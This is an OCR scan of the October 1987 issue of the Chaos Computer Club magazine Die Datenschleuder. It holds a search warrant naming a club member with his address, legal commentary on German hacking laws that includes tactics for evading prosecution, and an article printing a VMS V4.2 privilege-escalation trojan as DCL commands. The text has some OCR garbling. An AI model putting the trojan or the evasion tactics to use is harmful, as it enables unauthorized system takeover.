============== Page 1/1 ============== spic $nten§mlet&cr Was wisset I ! FachblaBM ' , ; 1 nreisendcl f in Orgärt <> s Chaos dtirti „ ub Numero 23 - Oktober 1987 DM3,00 kleinanzeige Amtsgericht Hamburg Abteilung 162 Sii'vrkiniiplnl. 3. Strafjustizgebäude, 2000 Hamburg 36 114 162 Gs 863/87 41 Js 56/87 34 97 572 16.9.1987 Beschluß In dem Ermittlungsverfahren gegen wegen des bestehenden Verdachts Steffen W e r n r y , geb. am 21.12.1961 in Wuppertal, u.a. der Auspähens von Daten beschließt das Amtsgericht Hamburg, Ableitung 162 Richter am Amtsgericht Masch: durch den Auf Antrag der Staatsanwaltschaft bei (dem Landgericht Hamburg wird die Durchsuchung XX der Wohn und Nebenräume XX der Geschäfts , Büro und sonstigen Betriebsräume xx / des Beschuldigten Steffen Wernery in Eppendorfer Lendntr. 165 bei Tizius, 2000 Hamburg 20, der ihm gehörenden Sachen sowie seiner /xx Person und seiner / xxxx Kraftfahrzeuge angeordnet. G i ii n d e : Der / XX Beschuldigte ist /XXX aufgrundder bisherigen Ermittlungen verdächtig, gemeinsam mit noch nicht ausreichend identifizierten Clubmitgiedern von Hamburg aus in der Zeit nach dem 01.08.1986 jeweils allein oder gemeinschaftlich handelnd durch mehrere selbständige Handlungen, jeweils durch dieselbe Handlung a ) unbefugt Daten, die nicht für sie bestimmt und die gegen unberechtigten Zugang besondere gesichert sind, sich oder einem anderen verschafft zu haben, b) eine Datenverarbeitung, die für einen fremden Betrieb ein fremdes Unternehmen oder eine Behörde von wesentlicher Bedeutung ist, da­ durch gestört zu haben, daß sie rechtswidrig Daten löschten, unterdrückten, unbrauchbar machten oder veränderten, indem sie jeweils allein handelnd oder gemeinsam 1) In das Computersystem VAX der europäischen Organisation für Kernforschung (Cern) in Genf (Schweiz) eindrangen, Daten ausspähten und veränderten, wobei Paßwörter und Privilegien so verändert wurden, daß für die Berechtigten keine Möglichkeit mehr bestand, auf ihr eigenes System zuzugreifen, 2) bei der Firma Philips in Frankreich in das dortige VAX-Com­ putersystem eindrangen, Daten ausspähten und veränderten so­ wie "Accounting"-Aktenunterlagen auslöschten, Kennworte modifizierten und Programme auf Systemniveau hinzufügten, wobei in beiden Fällen bei den Organisationen Schäden ent­ standen, die z.Zt. noch nicht absehbar sind. Vergehen, strafbar gemäß §§ 202a, 303a, 303b, 25 Abs. 1 und 2, 52, 53 StGB. 2 Die Datenschleuder Editorial Lieber Leser! Die beste Ausrede für unser diesmaliges Später­ scheinen werden Sie sicherlich schon der Tages­ presse entnommen haben. Es bereitet uns einige Schwierigkeiten, diese Datenschleuder mit einem erheblichen Defizit an Redaktionsmaterial und -Technik so aufzubereiten, wie sie jetzt hinter uns und vor Ihnen liegt. Leider hat uns das Bundes­ kriminalamt einiger Wissensmaschinen von zen­ traler Bedeutung für die Bildschirmtext- und Datenschleuder-Redaktion entledigt. irdische Außer Weltraumschiffe besuchen unsere Erde Das BKA hat sich bei uns nun also nicht nur eine kostenlose Schulung im Hacken sowie eine Grund­ ausstattung vorsortierter Literatur, sondern auch die persönlichen Daten aller unserer Mitglieder und Abonnenten abgeholt. Jeder Abonnent der Dateschleuder und jedes Mitglied des CCC e.V. ist daher spätestens jetzt beim BKA aktenkundig. Es kann nicht davon ausgegangen werden, daß der Datenschutz ge­ wahrt wird. In diesem Zusammenhang sei darauf hingewiesen, daß ein eventueller Prozeß zur Schaffung von Prä­ zedenzfällen für das zweite WiKG wahrscheinlich zu keinem juristisch brauchbaren Ergebnis, mit Si­ cherheit aber zu unserem ökonomischen Exitus füh­ ren würde, denn trotz öffentlicher Äußerungen dies­ bezüglich sind bisher leider keine Eingänge von Gorbie oder seinesgleichen auf unseren Konten gut­ geschrieben worden. Daher bitten wir die Leser und das Umfeld um finanzielle Unterstützung zur Gründung eines Pro­ zeßkostenfonds für mittellose Hacker. Schließlich pflegen wir für eben dieses Umfeld gelegentlich unsere Köpfe hinzuhalten, wenn irgendwelche wild­ gewordenen Ordnungsbehörden blindwütig um sich schlagen. Wir empfehlen, Spenden, die ausschließlich diesem Zweck dienen sollen, durch das Stichwort „HAC­ KERHILFE“ eindeutig zu kennzeichnen. Doch nun zu einer weiteren Folge aus der Serie „Pech und Pannen“: Die Telefonnummer des Ap­ parates in den Clubräumen („Achtung Abhörge­ fahr“) ist in der letzten Ausgabe zum Leidwesen eines nichtsahnenden Postgeschädigten fehlerhaft abgedruckt worden. Die richtige Nummer lautet: 490 37 57 „ Ein Specht hacktjetzt an unseren Rechnern und wir hacken auf der Schreibmaschine.“ Vic. Die Datenschleuder 3 Bits, Bugs & Vaxen DEPARTMENT SYSTEM MANAGER Erwartungsgemäß soll jede Art von Software, insbesondere das Betriebssystem einer Reche­ nanlage, dem Anwender einen fehlerfreien und sicheren Betrieb des Computersystems garan­ tieren. Die Systementwickler entwerfen Pro­ gramme, ohne auch nur im geringsten zu er­ warten, daß sie auf Anhieb korrekt sein werden. Programmierer verbringen mindestens genau so­ viel Zeit damit, ihre Software zu testen und even­ tuellen Fehlern entgegenzuwirken. Was das im einzelnen für Bugs, also Fehler sind, ist schwer zu sagen. Manche sind sicher harmlos, an­ dere möglicherweise kritisch und führen zum ge­ fürchteten Systemcrash. Programmierfehler sind nun einmal unvermeidbar, und manchmal auch ein­ fach unauffindbar. wender müssen lernen, Fehler und deren Konse­ quenzen zu erwarten. Ihnen wird gerade von den Hackern häufig erklärt, wie sie bis zur Verbesserung der Software die Fehler umgehen können. Gerade die VAX-Systeme und ihr Betriebssystem VMS von DEC setzen sich aus einfach zu verste­ henden und strukturiert aufgebauten SoftwareModulen zusammen. VMS gilt bei den Hackern nicht zu Unrecht als eines von der Qualität und Systemsicherheit meistgeschätztesten Betriebssy­ steme der Welt. Doch auch in dem so ausgeklügelten VMS werden immer wieder Bugs entdeckt, die sich als echte Sicherheitslöcher des Betriebssystems er­ weisen. Wer dennoch glaubt, daß Software Engineering pri­ mitiv ist und Fehler grundsätzlich vermieden werden können, der hat noch keine größeren Probleme in algorithmischer Form in Angriff genommen. Die großen Systemhersteller beschäftigen Spezialisten ausschließlich für die Qualitätssicherung ihrer Soft­ wareprodukte. Denn sie wissen, daß Programmierer eigene Fehler am schwersten finden oder diese gar mit Absicht einbauen können. Ziel eines auf Datenreise befindlichen VAXTüftlers ist bekannterweise nicht nur das Eindringen in VAXen, sondern diese auch unter Kontrolle zu bekommen. Um sich nun nach einem Eindringen in ein VAX-System die nötigen SYSTEM-Privilegien zu verschaffen, sucht der geschickte und erfahrene Hacker erst einmal nach dem SESAM ÖFFNE DICH des Betriebssystems. Erst wenn dieser gefunden ist und das Reich der Privilegien erschlossen wurde, gilt eine VAX unter Hackern als geknackt bzw. offen. Software wird nicht erst dann zur Benutzung frei­ gegeben, wenn sie nachweisbar korrekt funktioniert, sondern bereits dann, wenn die Häufigkeit, mit der neue Fehler entdeckt werden, auf ein für die Ge­ schäftsleitung akzeptables Niveau gesunken ist. An­ Einige dieser SESAM ÖFFNE DICH-VAXVerfahren gingen in die Geschichte ein. Des Hackers wahre Freude ist die Vielzahl und Reichhaltigkeit dieser Verfahren, um rasch als unpriviligierter User den Status des SYSTEM-Managers einzunehmen. 4 DIe Datenschleuder Die Geschichte vom Trojanischen DCL Pferd (Di­ gital Command Language) in VMS V4.2 bietet be­ sonderen Anlaß zur Aufmerksamkeit. DEC bietet seit der VMS Generation 4.X ein neues SECURITY Utility an - die ACE’s und ACL’s (Access Control Entries/Lists). DEC besagtes LOGIN, falls im UAF bei LGICMD keine andere Prozedur definiert wurde. Ein ACL bietet dem SYSTEM Manager die Mög­ lichkeit, auf bestimmte Objekte, wie etwa Dateien und Peripherie, nichtprivilegierten Usern Rechte zu gewähren oder eben auch zu verwehren. Seit VMS V4.2 ist nun neu, daß ACLs auch auf LOGICALs setzbar sind. Da im Prinzip jeder User ACLs ver­ wenden darf, stellte sich die Frage, ob eben diese auch auf Objekte setzbar wären, deren Berührung normalerweise SYSTEM-Privilegien erforderte. Das vom LOGICAL LOGIN aufgerufene Trojani­ sche DCL Pferd prüft die Privilegien jedes einlog­ genden Users und läßt die VAX vom eigenen SY­ STEM Manager persönlich sprengen. Als DCL Pro­ zedur bietet sich förmlich an: Die Softwareanalytiker bei DEC unterließen in VMS V4.2 die Prüfung auf das für eine Modifizie­ rung der SYSTEM-Tabelle erforderliche SYSNAM-Privileg. Dieses ermöglicht nun einem nichtpriviligierten User, die SYSTEM Tabelle mit einem ACL zu versehen, der äquivalent mit dem SYSNAM-Privileg sämtliche Rechte auf die SY­ STEM Tabelle gewährt. $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*,ACCESS=R+W+E+D+C) - LNM$SYSTEM-TABLE $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*,ACCESS=R+W+E+D+C) - LNM$SYSTEM-DIRECTORY Diese beiden DCL-Zeilen bieten mit der ID=* jedem User einer 4.2er VAX die Rechte R=read, W=write, E=execute, D=delete und C=control auf die SYSTEM-Tabelle. Dieser Bug birgt weiterhin das Risiko eines Systemcrashs, falls ein Unerfahrener alle in der SYSTEM-Tabelle befindlichen LOGI­ CALs löscht. Das SYSNAM-Privileg und somit auch dieser ACL zählen zur Gruppe der SYSTEMPrivilegien, doch dies bedeutet noch lange nicht, alle Privilegien einer VAX zu besitzen. Der Hacker bedient sich des Trojanischen Pferdes, indem er die Möglichkeit nutzt, fremde LOGICALs in die SYSTEM-Tabelle einzutragen. Jeder einlog­ gende User durchläuft eine ihm zugewiesene loginProzedur. Weist man dieser Prozedur einen LOGICAL-Namen zu, so wird VMS erst dem LO­ GICAL folgen und nicht erst die Prozedur namens LOGIN.COM starten. Im User Authorization File (UAF) wird für jeden User diese login-Prozedur als LGICMD definiert. Im Grundzustand verwendet Die Datenschleuder $ DEFINE/SYSTEM LOGIN DISK:ÄDIRECTORYÜTROJANHORSE.COM $ IF F$PRIVILEGE(“SETPRV“) .EQS. “FALSE“ THEN GOTO NIX $ SET PROCESS/PRIVILEGE=ALL $ SET PROTECTION=(W:RWED) SYS$SYSTEM:SYSUAF.DAT $ DELETE ’ F$LOGICAL(“LOGIN“) $ DEASSIGN/SYSTEM LOGIN $ NIX: $ §SYS$LOGIN:LOGIN.COM Es darf nicht vergessen werden, dieses File auch für die Benutzung durch World User freizugeben. Der erste einloggende privilegierte User wird unbemerkt dem Hacker die Kontrolle über das SYSTEM an­ vertrauen. Der Hacker braucht nur noch mittels des UAF-Programms und eventueller Umgehung von möglichen Security-Maßnahmen seitens des SYSTEM-Managers seinem eigenen Account alle Privilegien zu geben. SYSTEM-Manager oder Hac­ ker können natürlich ebenso durch einen ACL die Modifizierbarkeit der SYSTEM-Tabelle verhin­ dern. $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*,ACCESS=R+E) - LNM$SYSTEM-TABLE $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*,ACCESS=R+E) - LNM$SYSTEM-DIRECTORY Diese Methode wurde bereits in der amerikanischen DECUS Pagewapper Anfang letzen Jahres disku­ tiert. DEC reagierte damals mit einem VMS-Update auf V4.3, womit dieser DCL-Bug verschwand. Er­ staunlicherweise existieren am internationalen Da­ tennetz immer noch Maschinen mit der 4.2er Betriebssystem-Version. Kaum zu glauben, daß dort noch nicht einmal der Bug bekannt zu sein scheint. S.Stahl 5 Die aktuellen Tarife für’s Hacken WROMM! WOSCH! 1. Teil Jede Freizeitbeschäftigung hat ihren Preis. Zu den exclusiven, superteuren Hobbies würde ich das Hacken zählen. Nicht wegen der wuche­ rähnlichen Gebühren der Post. So ärgerlich die auch sein mögen, das allein wäre noch erträglich. Gemeint sind die aktuellen “Tarife“, die ein Hac­ ker zu “bezahlen“ hat, wenn er sich erwischen läßt. Der NASA-Hack, der wieder viele unbe­ darfte Nachahmer motivieren dürfte, sowie die die jüngsten Hausdurchsuchungen beim CCC Steffen und Wau - wegen angeblicher Hacks bei CERN (Schweiz) und Philips (Frankreich) sind ein guter Anlaß, die Tarifstruktur durchschau­ bar zu machen. Mit Wirkung vom 1.8.1986 sind die in der Presse sogenannten Anti-Hacker-Gesetze in Kraft getreten. Korrekt geht es um das zweite Gesetz zur Be­ kämpfung von Wirtschaftskriminalität (2. WiKG). Nachfolgend wollen wir einmal betrachten, was die­ se Gesetze dem Hacker so zu bieten haben. Für den preiswerten Einstieg (bis zu 2 Jahren Frei­ heitsstrafe oder Geldstrafe) wäre zunächst der neue Ü 202a StGB zu nennen. Besonderer Vorteil: Je­ derzeit problemlos zu buchen! In Ü 202a StGB wird das “Ausspähen von Daten“ unter Strafe gestellt. Strafbar macht sich, “wer unbefugt Daten, die nicht für ihn bestimmt und gegen unberechtigten Zugang besonders gesichert sind, sich oder einem anderen verschafft“. 6 Es müssen also Daten sein, die nicht für einen be­ stimmt sind und für die man keine Zugangsberech­ tigung hat. Soweit, so gut. Es muß sich also um Daten handeln, die “besonders gesichert“ sind, welche man sich oder einen anderen “verschafft“. Was aber ist unter “besonders gesichert“ und “verschaffen“ i.S.d. Ü 202a StGB zu verstehen? Fraglich ist vor allem, ob schon ein einfacher und normaler Paßwortschutz die Daten besonders si­ chert. Da es kaum einen simpleren und primitiveren Schutz von Daten gibt als eine Paßwortabfrage, kann man also wohl kaum von einer besonderen Siche­ rung sprechen. Andererseits ist ein Paßwort die derzeit technisch unkomplizierteste, wirtschaftlich vertretbarste und zugleich auch praktisch sinnvollste Schutzmaß­ nahme. Außerdem hat der Besitzer der Daten durch einen Paßwortschutz hinreichend deutlich gemacht, daß diese Daten nur befugten Personen zur Verfü­ gung stehen sollen, und daß er sich um die Abwehr von Unbefugten ernsthaft bemüht. Damit sind die Voraussetzungen erfüllt, die der Gesetzgeber erfüllt wissen wollte, um einen strafrechtlichen Schutz von Daten zu gewähren. Gerichtsentscheidungen sind, soweit mir bekannt, hierzu noch nicht ergangen. Die soeben ausgeführte Argumentation halte ich für richtig, und sie ist im juristischen Schriftum inzwischen vorherrschend. Von daher ist davon auszugehen, daß eine Straf­ barkeit wegen Ausspähens von Daten schon dann in Betracht kommt, wenn die Daten nur durch eine Paßwortabfrage gesichert sind. Damit sind wir bei dem Problem: Wann hat man sich (oder einem anderen) Daten “verschafft“? Zum einen, wenn man selbst von den Daten Kenntnis erlangt (also wenn man sie liest) bzw. einem anderen die Kenntnisnahme ermöglicht. Auch ohne Kennt­ nisnahme sind die Daten “verschafft“, wenn man sie in Besitz nimmt. Das wäre der Fall, wenn die frem­ den Daten auf einem Datenträger mitgespeichert oder auf Papier ausgedruckt werden. Wer also den Paßwortschutz eines Systems knackt und sich dann in dem System umsieht, das heißt Daten liest oder downloaded, hat den Ü 202a StGB fest gebucht. Wer erwischt wird, könnte sich allerDie Datenschleuder dings darauf berufen, er habe nur das Paßwort ge­ knackt, sich dann aber sofort wieder ausgeloggt, ohne sich im System weiter umgesehen zu haben. Das ist zwar kaum wahrscheinlich, das Gegenteil dürfte aber nur schwer zu beweisen sein. Fraglich ist, ob diese Argumentation geeignet ist, einer Strafe wegen Ausspähens von Daten zu ent­ gehen. Immerhin ist das erhackte Paßwort auch ein Datum, was man sich verschafft hat. Und zwar eins, das besonders geschützt ist: Quasi durch das Paß­ wort selbst! Warten wir ab, wie die Gerichte ent­ scheiden werden. Festzuhalten bleibt, daß wer in eine durch Paßwor­ tabfrage gesicherte Mailbox, Datenbank oder ein sonstiges Rechnersystem (vorsätzlich) unbefugtein­ dringt, mit einer Strafe wegen Ausspähens von Da­ ten zu rechnen hat. Als kleines Bonbon für gefrustete Hacker: Der Versuch ist nicht unter Strafe gestellt. Außerdem wird die Straftat nur auf Antrag des Ver­ letzten verfolgt. D.h., daß die Staatsanwaltschaft von sich aus die Tat nicht verfolgen kann. Soweit der Billigtarif für Einsteiger. Aber das Gesetz hat für extravagante Kunden auch noch teurere An­ gebote auf Lager. Z.B. für solche, die Daten zer­ stören oder verändern. Dazu zählen auch der Einsatz von Viren oder (die wohl auch beim NASA-Hack eingestzten) Trojanischen Pferde. Damit sind wir beim Thema Datenveränderung (Ü 303a StGB) und Computersabotage Ü 303b StGB). Der Tarif für die schlichte Daten Veränderung ist noch relativ moderat: Es wird Freiheitsstrafe bis zu zwei Jahren oder Geldstrafe geboten. Computersabotage kommt schon teurer: Freiheitsstrafe bis zu 5 Jahren oder Geldstrafe. Manche Hacker werden sich jetzt vielleicht in die Brust werfen, bekannte Phrasen über “Hacker-Ethos“ ablassen und kategorisch fest­ stellen: “Hacker sabotieren nicht.“ - Doch! So zum Beispiel die NASA-Hacker! (Oder waren das gar keine “Hacker“ ???) Zunächst zur Datenveränderung. Bestraft wird, wer Daten “löscht, unterdrückt, unbrauchbar macht oder verändert“. Da ist das Gesetz einmal so erfreulich deutlich, daß es auch dem Laien kaum noch kom­ mentiert zu werden braucht. Praktisch jede Mani­ pulation von gespeicherten Daten wird von der Norm erfaßt. Dazu gehört natürlich auch das Er­ gänzen von Daten, zum Beispiel das Einfügen eines neuen Paßworts in die Passwort-Datei. Fast über­ flüssig zu erwähnen, daß Programme selbstverDie Dateschleuder ständlich auch Daten sind. Werden Programme durch Viren oder Trojanische Pferde verändert, so liegt eine strafbare Datenveränderung vor. Dies kommt ebenso in Betracht, wenn Daten an einen anderen Empfänger umgeleitet oder sonst abgefan­ gen werden. Im Gegensatz zum Ausspähen von Daten ist hier auch schon der Versuch strafbar. Stümperei schützt also vor Strafe nicht! Verfolgt wird die Datenve­ ränderung - wie auch die im Anschluß vorgestellte Computersabotage - nur auf Antrag. Bei besonderem öffentlichen Interesse kann die Staatsanwaltschaft aber auch von Amtswegen, also ohne Strafantrag des Verletzten, einschreiten. Die Computersabotage (Ü 303B StGB) soll uns hier nur in ihrer ersten Fallgestalt (Ü 303b I Nr.l StGB; Nr.2 bezieht sich nur auf Beschädigung von Hard­ ware) interessieren. Dort baut sie auf der Datenve­ ränderung auf. Computersabotage ist demnach eine Datenveränderung (wie oben dargestellt), wenn da­ durch “eine Datenverarbeitung, die für einen frem­ den Betrieb, ein fremdes Unternehmen oder eine Behörde von wesentlicher Bedeutung ist“, gestört wird. “Von wesentlicher Bedeutung“ ist eine DVA, wenn von ihrem störungsfreien Ablauf die Funktions­ tüchtigkeit des Betriebes im Ganzen abhängt. Dies betrifft heute, rasch zunehmend, die meisten Be­ triebe, Unternehmen oder Behörden, die eine elek­ tronische Datenverarbeitung einsetzen. Keineswegs falsch dürfe die Annahme sein, daß die EDV-Anlagen der NASA und der ihr angeschlos­ senen Forschungsinstitute für ihre Betreiber eine wesentliche Bedeutung haben. In diesen Anlagen der NASA (und anderer Institute) sind bei dem NASA-Hack Daten durch Einsatz von Trojanischen Pferden verändert worden. Damit haben die NASAHacker ein schönes Beispiel für eine Computersa­ botage geliefert. Auch bei der Computersabotage ist schon der Versuch strafbar. Zur Erforderlichkeit eines Strafantrags siehe oben. Im folgenden zweiten Teil dieses Artikels werden die etwas teureren Normen vorgestellt und Überle­ gungen angestellt, ob und wie unter bestimmten Umständen straffreies Hacken möglich sein könnte. Stoepsel CLINCH/DS-RED/STOEPSEL/30.09.87/23:20/8494 Z. 7 Die aktuellen Tarife für’s Hacken 2. Teil H ackern, denen selbst bei Androhung von bis zu fünf Jahren Freiheitsstrafe noch der rechte Nervenkitzel fehlt, kann geholfen werden. So sind im Rahmen der “Anti-Hacker-Gesetze“ Normen eingeführt worden, nach denen in besonderen Fällen bis zu 10 und sogar bis zu 15 Jahren Freiheitsstrafe verhängt werden kann. Mehr hat unser Strafrecht selbst einem Tot­ schläger nicht zu bieten. 8 Btx 655322 Die Datenschleuder mit dem Vermögensvorteil, den der Täter anstrebt und auch erwirbt. Damit liegen die Voraussetzungen des Computerbetrugs vor. Die Normen, bei denen die angesprochenen hohen Strafen (in besonders schweren Fällen) verhängt werden können, sind der Computerbetrug (Ü 263a StGB) und die Fälschung beweiserheblicher Daten (Ü 269 StGB). Hier sind wir wieder an einem Punkt, wo “ehrliche“ und “ehrenhafte“ Hacker aufbegehren werden: “Be­ trügen tun wir wirklich nicht!“ - Nein, wirklich nicht? Da wäre ich mir gar nicht so sicher. Der Computerbetrug nach Ü 263a StGB baut auf dem “normalen“ Betrug auf. Er soll Strafbarkeits­ lücken schließen, wenn statt eines Menschen ein Computer “betrogen“ wird. Daher sei hier zunächst der schlichte Betrug nach Ü 263 StGB erklärt. Der Betrug nach Ü 263 StGB setzt in Kurzform folgendes voraus: Der Täter nimmt einem anderen gegenüber eine Täuschungshandlung vor. Diese be­ wirkt bei dem Getäuschten einen Irrtum. Aufgrund dieses Irrtums nimmt der Getäuschte eine vermö­ gensschädigende Verfügung über eigenes oder fremdes Vermögen vor. Beim Computerbetrug nach Ü 263a StGB ist die Vermögensschädigung eines Dritten nun auch straf­ bar, wenn nicht eine Person, sondern ein Computer durch Eingriffe ins Programm oder durch Manipu­ lation von Daten etc. “getäuscht“ wird. Ein einfaches Beispiel für einen Computerbetrug: Bankange­ stellter A manipuliert die im Computer seiner Bank gespeicherten Daten so, daß sein Minuskonto wieder einen schönen Guthabenbetrag ausweist. Fälle die­ ser Art mögen dem Gesetzgeber in erster Linie vor­ geschwebt sein, als erden Ü 263a einführte. Aber die Anwendbarkeit des Computerbetrugs geht erheblich weiter. So ist der Gebrauch von “Leih-NUI’s“ un­ problematisch als Computerbetrug zu bewerten. Denn das Vermögen des NUI-Inhabers wird dadurch geschädigt, daß durch unbefugte Benutzung von Daten (NUI Teil A und B) der Ablauf eines Datenverabeitungsvorgangangs (beim PAD durch Lei­ stungsgewährung an den Unberechtigten) beeinflußt wird. Dieser Vermögensschaden ist “stoffgleich“ Die Datenschleuder Entsprechend dürften, abhängig vom Einzelfall, die Voraussetzungen eines Computerbetruges auch dann vorliegen, wenn mit einem fremden oder fal­ schen Paßwort ein anderes Netzwerk für eine preis­ werte Datenreise geöffnet wird. Von daher könnte auch unter diesem Gesichtspunkt beim NASA-Hack ein Computerbetrug begangen worden sein. Allgemein ist zu den Voraussetzungen des Com­ puterbetrugs noch anzumerken, daß strafbar nur die vorsätzliche Handlung ist. Wie schon angedeutet, muß zusätzlich, wie bei Ü 263 auch, der Täter die Absicht haben, sich durch seine Handlung einen rechtswidrigen Vermögensvorteil zu verschaffen. Auch beim Computerbetrug ist schon der Versuch strafbar. Abschließend kommen wir zur Fälschung bewei­ serheblicher Daten (Ü 269 StGB). Bestraft wird nach dieser Norm, wer zur Täuschung im Rechtsverkehr beweiserhebliche Daten so speichert oder verändert, daß bei ihrer Wahrnehmung eine unechte oder ver­ fälschte Urkunde entstehen würde. Ebenso bestraft wird, wer derart gespeicherte oder veränderte Daten gebraucht. Aufgrund des doch recht beträchtlichen Strafrahmens - es können bis zu fünf, und wie bereits dargelegt, in besonders schweren Fällen bis zu 15 Jahren Freiheitsstrafe verhängt werden - soll hier etwas näher erläutert werden, wann eine Strafbarkeit nach Ü 269 StGB vorliegen könnte. Ü 269 StGB knüpft an den Ü 267 StGB (Urkun­ denfälschung) an. Im Unterschied zu Urkunden sind Daten nicht unmittelbar wahrnehmbar. Die Daten sind im Hauptspeicher des Computers oder auf Da­ tenträger gespeichert. Dort sind sie für den Men­ schen nicht ohne Hilfsmittel sichtbar. Erst wenn die Daten auf einem Bildschirm angezeigt oder von einem Drucker ausgedruckt werden, sind sie wahr­ nehmbar. Frühestens dann könnten die Daten eine Urkunde sein. Der Gesetzgeber wollte die Straf­ barkeit aber vorverlegen auf den Zeitpunkt der Ma­ nipulation der Daten. Das hat den Vorteil, daß die Strafbarkeit nicht zufällig davon abhängt, ob bzw. wann die Daten sichtbar gemacht werden. Deswegen ist in Ü 269 StGB unter Strafe gestellt worden, beweiserhebliche Daten so zu manipulieren, daß diese Daten - wären sie unmittelbar wahrnehmbar eine unechte oder verfälschte Urkunde darstellen würden. 9 Entscheidend ist, was unter einer unechten oder verfälschten Urkunde zu verstehen ist. Eine unechte Urkunde würden die Daten bei ihrer Wahrnehm­ barkeit sein, wenn über den Aussteller der Urkunde getäuscht wird. Also wenn die Daten nicht von demjenigen stammen, von dem sie zu stammen scheinen. Verfälscht wird eine Urkunde, wenn eine zunächst echte Urkunde so verändert wird, daß ihr Inhalt dem Erklärenden (Aussteller) nicht mehr zu­ zurechnen ist. Ebenfalls bestraft wird das Gebrauchen der in oben beschriebener Weise manipulierten Daten. Ein Ge­ brauchen liegt z.B. vor, wenn dem zu Täuschenden die Daten auf einem Datenträger überlassen oder am Bildschirm sichtbar gemacht werden. Dazu ein Beispiel: Banklehrling L “spielt“ an dem Rechner seines Kreditinstituts herum. Dabei mani­ puliert er die im Rechner gespeicherten Daten so, daß sein Girokonto endlich mal wieder schwarze Zahlen zeigt. Außerdem richtet er sich ein neues Sparbuch mit einem Guthaben von 100.000,- DM ein. - Im ersten Fall würde bei Wahrnehmbarkeit der Daten eine verfälschte, im zweiten eine unechte Urkunde vorliegen. Gut, so etwas tut ein Hacker nicht. Aber eine NUI “leiht“ er sich doch schon einmal aus. Dabei ist die Rechtslage nicht so zweifelsfrei wie bei dem obigen Beispiel, aber eine Fälschung beweiserheblicher Da­ ten kommt auch dort in Betracht. Denn durch Ein­ gabe der NUI Teil A und B scheint doch der NUIInhaber zu erklären, daß er die Verbindung zum PAD hergestellt hat und für die anfallenden Gebühren (notgedrungen) aufkommen will. Wären diese be­ weiserheblichen Daten unmittelbar wahrnehmbar, würden sie wohl als Urkunde einzustufen sein. In der Literatur ist dieses Beispiel noch nicht erörtert wor­ den, aber mir scheint, daß man hier das Vorliegen eines Delikts der Fälschung beweiserheblicher Da­ ten bejahen müßte. Damit sind die wichtigsten Tariffragen für Hacker geklärt. Klar dürfte jetzt sein, daß es kaum möglich ist, zu hacken, ohne sich strafbar zu machen. Damit stellt sich für Einzelpersonen und Vereine, die die Unsicherheit der Netze erforschen und aufdecken wollen (und nur um die soll es hier gehen - Hackern die aus purer Neugier, Geltungssucht oder sogar Gewinnsucht handeln, kann und will ich nicht hel­ fen) die Frage, ob und wie sie noch hacken können, ohne ein großes Strafrisiko auf sich zu nehmen. Denn eins steht fest: Der legendäre HASPA-Coup 10 JE SCHÄRFER, des CCC ließe sich bei der heutigen Gesetzeslage nicht wiederholen, ohne daß die Akteure mit Freiheits- und/oder Geldstrafen rechnen müßten! Theoretisch bieten sich zwei Möglichkeiten an. Die erste Möglichkeit wäre, sich um die Gesetze nicht viel zu scheren, aber dafür zu sorgen, daß einem nichts nachgewiesen werden kann. Die zweite Mög­ lichkeit wäre so vorzugehen, daß man sich trotz raffinierter Hacks nicht strafbar macht. Wenden wir uns zunächst der ersten Möglichkeit zu. Sie hat den Vorteil, daß man sich kaum Einschrän­ kungen beim Hacken auferlegen müßte. Der große Nachteil ist der gewaltige Risikofaktor dabei. Da ja Zweck der ganzen Üung sein soll, sich nach einem erfolgreichen Hack an die Öffentlichkeit zu wenden, um die Sicherheitslücken publik zu ma­ chen, muß man zwangsläufig den Kopf aus der Deckung nehmen und damit auch den Strafverfol­ gungsbehörden eine Angriffsfläche bieten. Es scheint sich nur eine halbwegs erfolgsverspre­ chende Lösung anzubieten, wie man dennoch einer Bestrafung entgehen könnte. Dies wäre ein Vorge­ hen, ähnlich wie der CCC beim NASA-Hack prak­ tiziert hat. Man bekennt nicht, die Tat selbst verübt zu haben. Stattdessen schiebt man den großen Un­ bekannten vor, der die Tat begangen habe, die man selbst nun für ihn publik mache. Solange sich nicht beweisen läßt, daß der Unbekannte eine Erfindung ist und der wahre Täter der den Hack Publizierende ist, kann letzterer auch nicht bestraft werden. Da derjenige, der den Hack publiziert, angeblich nicht Täter ist, ist er grundsätzlich als Zeuge zur Aussage verpflichtet. Wird die Aussage verweigert, kann ein Ordnungsgeld verhängt und Erzwin­ gungshaft bis zu 180 Tagen angeordnet werden. Also auch keine rechte Perspektive. Die Datenschleuder DESTO ANREGENDER. Hiergegen hilft nur, sich darauf zu berufen, daß man keine sachdienlichen Angaben machen könne. Dies ist bei einem detalierten Bericht über den Hack kaum glaubwürdig. Daher wäre die Gefahr einer Erzwin­ gungshaft auf diese Weise nur schwerlich abzu­ wenden. Ein anderer Ausweg wäre noch, sich auf das Zeugnisverweigerungsrecht zu berufen. Ein solches steht einem zu, wenn man sich andernfalls selbst oder einen nahen Verwandten belasten müßte. Da­ mit ist dann der große Unbekannte aber im Prinzip wieder gestorben. Die Staatsanwaltschaft wird schnell nachweisen können, daß das Zeugnisver­ weigerungsrecht nicht besteht, oder aber den Tä­ terkreis sehr eng eingrenzen können. Damit stellt sich die Frage: Gibt es Beweise die sich finden ließen, Zeugen die bei bohrender Befragung “sin­ gen“ könnten? Wenn ja, dann ist das Spiel verloren! Erheblich sicherer ist es da, jemand einzuschalten, der aus beruflichen Gründen ein Zeugnisverweige­ rungsrecht hat: Einen Rechtsanwalt. Dieser wird damit betraut, im Namen seiner nicht zu benen­ nenden Mandanten der Öffentlichkeit die entspre­ chenden Erklärungen und Belege für den Hack ab­ zugeben. Aber auch diese Methode ist nicht ohne Nachteile. Auch wenn der Anwalt weder Aussagen braucht noch machen darf, so läßt sich doch mög­ licherweise über den Anwalt auf die in Betracht kommenden Täter schließen. Wenn das gelingt, stellt sich wieder die Frage: Läßt sich bei denen etwas finden, gibt es undichte Zeugen? solche Hacks zu machen, bei denen man zuvor eine Einwilligung des Opfers einholt. Bei einer Wie­ derholung des HASPA-Coups etwa müßte man vorher zu HASPA gehen und sagen, was man vor hat, warum man es vorhat, und dafür um Erlaubnis bitten. Wenn man diese erhält und sich ausschließlich im Rahmen dieser Einwilligung bewegt, ist jedes Stra­ frisiko ausgeschlossen. Wenn man sein Vorhaben vorher genau ankündigen muß, mindert das natürlich die Erfolgsaussichten rapide, da der Betroffene sich auf den bevorstehen­ den Angriff einstellen und vorbeiten kann. Ander­ seits ist die 